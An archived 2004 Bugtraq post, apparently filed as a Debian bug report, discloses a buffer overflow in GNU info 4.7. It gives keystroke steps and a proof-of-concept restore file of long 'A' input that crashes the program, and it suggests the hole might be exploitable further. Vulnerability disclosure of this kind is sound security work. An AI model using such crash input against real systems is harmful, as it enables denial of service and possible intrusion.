lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 6 Aug 2004 00:46:21 -0000
From: Josh Martin <skizzles@...il.com>
To: bugtraq@...urityfocus.com
Subject: GNU/Linux 'info Buffer Overflow




Package: info
Version: 4.7-2.1
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: LANG=C, LC_CTYPE=C

Versions of packages info depends on:
ii  libc6                       2.3.2.ds1-15 GNU C Library: Shared libraries an
ii  libncurses5                 5.4-4        Shared libraries for terminal hand

-- no debconf information

Information:
I have tested several versions (Debian stable, unstable and testing) and
have found that this bug exists in all versions tested. I have included
a small --restore script that can be used to leverage a simple Seg fault.
This buffer overflow is very trivial to leverage as there are several
bytes available (10-15+).  It may be possible that arbitary system calls
could be made though this hole. It is also possible to leverage this
from the command line using the --restore=FILENAME flag, and need not
have the program running.  Although it is not running as suid, or as a
daemon, in a case where info is being used as a public service, it may
be a security problem. This bug seems only to be accessable where the
file has xrefs available.

Walkthrough:
        $ info info
        [info screen comes up]
        press 'g'
        [Goto Node:]
        type 'Expert Info' <enter>

        (OR any other way to get to a page with xrefs)

        press 'f'
        Type in 225 or more bytes and press enter.
        SEG FAULT!

Example File:
        The following can be saved to a file and called as:  
        info info  --restore=info.bug to create a segmentation fault.

        [START info.bug]
        gExpert Info
        fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        [END info.bug]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ